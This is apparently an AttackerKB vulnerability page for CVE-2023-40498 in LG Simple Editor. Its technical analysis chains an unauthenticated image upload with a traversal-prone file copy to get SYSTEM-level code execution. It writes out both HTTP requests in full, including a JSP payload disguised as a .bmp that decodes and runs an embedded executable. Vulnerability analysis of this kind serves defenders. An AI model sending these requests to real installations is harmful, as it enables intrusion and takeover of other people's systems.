Very High
CVE-2023-40498
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(1 user assessed)Very High
(1 user assessed)Unknown
Unknown
Unknown
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
LG Simple Editor cp Command Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the cp command implemented in the makeDetailContent method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
. Was ZDI-CAN-19925.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
LG Simple Editor is a solution that enables you to create and distribute content easily and quickly by using templates. LG Simple Editor is recommended for small businesses and sports bars which require simple content display or play-on-air via their signage. It enables easy new content creation by simplifying processes, and immediate playback on signage. Version prior to v3.21
suffer from two vulnerability specifically a broken access control and directory traversal that result in remote code execution in the context of NT AUTHORITY \SYSTEM
Vulnerable Versions
- <= v3.21
Attacker Value & Exploitability
This exploit scores 5/5 in both categories primarily due to the fact the exploit provides unauthenticated remote code execution in the context of NT AUTHORITY \SYSTEM
. Other contributing factors are of course how it is vulnerable straight out of the box and how easy it is to exploit. It might not be as common in enterprise by nature of the product description above however I don’t think that should affect either of these ratings.
How it works
First start by exploiting the broken access control vulnerability (which at the time of writing does not have a CVE – it could be considered a feature). The endpoint /simpleeditor/imageManager/uploadImage.do
will allow you to upload a file with the .bmp
file extension of which the contents are not inspected thoroughly. In order to obtain remote code execution we can upload a malicious .jsp
under the disguise of a .bmp
file extension. The following .jsp
payload (used by the metasploit module windows/http/lg_simple_editor_rce
) first base64 decodes the raw bytes of a malicious executable, then writes the executable to a file, then runs the executable with Runtime.getRuntime().exe
.
POST /simpleeditor/imageManager/uploadImage.do HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: multipart/form-data; boundary=---------------------------761960311879735919883545313592 Content-Length: 99894 -----------------------------761960311879735919883545313592 Content-Disposition: form-data; name="uploadFile"; filename="SyouN.bmp" Content-Type: image/bmp Content-Transfer-Encoding: binary <%@page import="java.io.*" %> <%@page import="sun.misc.BASE64Decoder"%> <% try { String cXaet = " <<binary payload base64 encoded>> "; BASE64Decoder dHhlo = new BASE64Decoder(); byte[] aHZZzH = dHhlo.decodeBuffer(cXaet.toString()); File eplNCoYo = File.createTempFile("OXvZEnQ", ".exe"); String fbhUvbGUQZA = eplNCoYo.getAbsolutePath(); BufferedOutputStream bghnAwAsukY = new BufferedOutputStream(new FileOutputStream(fbhUvbGUQZA)); bghnAwAsukY.write(aHZZzH); bghnAwAsukY.close(); Process eVsTEolPjY = Runtime.getRuntime().exec(fbhUvbGUQZA); } catch (Exception e) { } %> -----------------------------761960311879735919883545313592 Content-Disposition: form-data; name="uploadPath" / -----------------------------761960311879735919883545313592 Content-Disposition: form-data; name="uploadFile_x" -1000 -----------------------------761960311879735919883545313592 Content-Disposition: form-data; name="uploadFile_y" -1000 -----------------------------761960311879735919883545313592 Content-Disposition: form-data; name="uploadFile_width" 1920 -----------------------------761960311879735919883545313592 Content-Disposition: form-data; name="uploadFile_height" 1080 -----------------------------761960311879735919883545313592--
Now we can exploit the vulnerability that is tied to CVE-2023-40498. The /simpleeditor/fileSystem/makeDetailContent.do
endpoint allows unauthenticated users to copy files on the filesystem with no directory traversal mitigations in place. So we can copy our malicious .bmp
file to a file with the extension .jsp
so we can execute it (ezpz some might say). This can be achieved by issuing the following POST request:
POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 X-Requested-With: XMLHttpRequest Accept: application/json Content-Type: application/json Content-Length: 86 {"command":"cp","option":"-f","srcPath":"/SyouN_original.bmp","destPath":"/SyouN.jsp"}
The payload we uploaded is now in an executable file format in a directory accessible without authentication.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- LG
Products
- Simple Editor
References
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: